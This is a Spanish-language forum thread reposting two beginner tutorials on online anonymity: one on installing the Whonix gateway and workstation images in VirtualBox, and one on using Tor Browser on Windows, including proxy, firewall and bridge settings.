    Whonix-Workstation: El "sistema de trabajo" del usuario donde están todas sus aplicaciones. Se puede conectar únicamente mediante el gateway a internet, y se encuentra completamente aislado de cualquier otro tipo de conexión.

Whonix, a diferencia de otras distribuciones destinadas al anonimato, obtiene su seguridad mediante el aislamiento completo del sistema donde el usuario trabaja, logrando así un nivel de seguridad que puede llegar a parecer paranóico.

¿Qué características ofrece?

Según sus desarrolladores, aunque las aplicaciones que utilice el usuario posean errores o código malicioso que intente revelar la identidad real de éste, al ejecutarse dentro de una máquina virtual (que se encuentra completamente aislada de toda red salvo la de Tor), es imposible que haya una fuga o que éste pueda obtener la IP real del usuario.

Como desventaja, podemos mencionar que éste sistema sea un poco complejo de configurar, y que al ejecutarse en máquinas virtuales (VMs) tiene mas requisitos de hardware que otras alternativas. Aún así, si poseemos 2GB de RAM ó más y 10GB de espacio en disco, es suficiente para que podamos ejecutarlo.

¿Cómo instalar Whonix?

Primero, necesitaremos descargar e instalar la última versión de VirtualBox, ya sea desde el sitio web o del repositorio de nuestra distribución de Linux favorita.

Luego, descargaremos las dos Imágenes de Whonix mediante alguno de los métodos disponibles en su página web. Lo más común es descargarlo mediante HTTP o Torrent, aunque los desarrolladores incluso recomiendan que dependiendo del país donde residas, o cuan paranóico seas, no solo descargues las fuentes y las compiles tú mismo, sino que lo hagas por medios seguros como Tor, logrando así que nadie sepa que usas Whonix.



Una vez descargadas las imágenes, abrimos VirtualBox, vamos a Archivo -> Importar, y elegímos el fichero Whonix-Gateway.ova, que descargamos anteriormente. Repetimos el proceso para Whonix-Workstation.ova y esperamos que terminen de importar ambos.

Estas imagenes traen la configuración recomendada de los desarrolladores, aunque es posible que reduzcamos la RAM asignada al Whonix-Gateway a 128MB o menos en caso de contar con poca memoria disponible en nuestro sistema y no necesitar un escritorio gráfico para realizar algún cambio en la configuración.



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#40
Una Forma de navegar anonimante es mediante nodos de tor .
Cuando utilizas Internet gran parte de la información que recibes y transmites es registrada. Incluso si utilizas un navegador en modo privado o cifras tu información, es posible conocer lo que realizas en la red.

En este sentido, la navegación anónima es útil para evitar el seguimiento de sitios web que buscan conocer tus hábitos y preferencias, utilizar servicios que han sido restringidos en tu país o mantener el anonimato en comunicaciones que resulten sensibles. Combinado con otras conductas, es posible evitar que tu información sea registrada por terceros.

Un servicio que permite anonimizar tus actividades es Tor (The Onion Router), un software libre que junto con una red de computadoras voluntarias oculta tu dirección IP (número que identifica tu máquina en la red) y asigna otra de cualquier parte del mundo. A pesar de que la información no es un secreto, tampoco es asunto de otras personas.

En este post explicamos cómo utilizar la herramienta en un sistema Windows. Para comenzar, descarga Tor (preferentemente del sitio oficial). La manera más sencilla de comenzar es con el navegador preconfigurado, a través del paquete Tor Browser Bundle. La instalación crea una carpeta que incluye la aplicación Start Tor Browser, la cual debes ejecutar. Cuentas con dos opciones: conectarte de manera directa a la red de Tor o configurar la aplicación en el caso de que exista alguna restricción en tu red.



La primera opción (Connect) ejecuta el navegador, a partir de lo cual ya puedes comenzar a navegar de forma anónima en la red.



De manera aleatoria se asigna una dirección IP a tu conexión, que geográficamente se encuentra en otro lugar. Este cambio permite ocultar tu ubicación física, para verificarlo puedes hacer uso de los servicios que te permiten conocer la dirección IP con la que navegas.
.




Con la segunda opción (Configure), puedes configurar la herramienta para tres casos: si utilizas un proxy, si estás protegido por un firewall o si el Proveedor de Servicios de Internet (ISP por sus siglas en inglés) bloquea las conexiones de Tor.

Para el primer caso se debe proporcionar el tipo de proxy, dirección IP y puerto. Si es requerido por el servidor, debes introducir el nombre de usuario y la contraseña.



En el segundo caso, si la navegación que realizas está protegida por un firewall (de red o host), es necesario indicar los puertos permitidos para los servicios web.




Para el tercer caso, puedes configurar bridges si algún ISP bloquea las conexiones de Tor para tener el control sobre las comunicaciones.

¿Pero qué es un bridge? Para funcionar, Tor hace uso de una red de computadoras a través de las cuales redirecciona el tráfico antes de mostrar la dirección IP modificada. Dicho tráfico debe pasar por al menos tres computadoras (o nodos) previo a su destino.

El ISP puede bloquear los nodos que son conocidos, por esta razón, la configuración del bridge consiste en incluir un nodo que no es conocido públicamente y por lo tanto no puede ser bloqueado:




Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta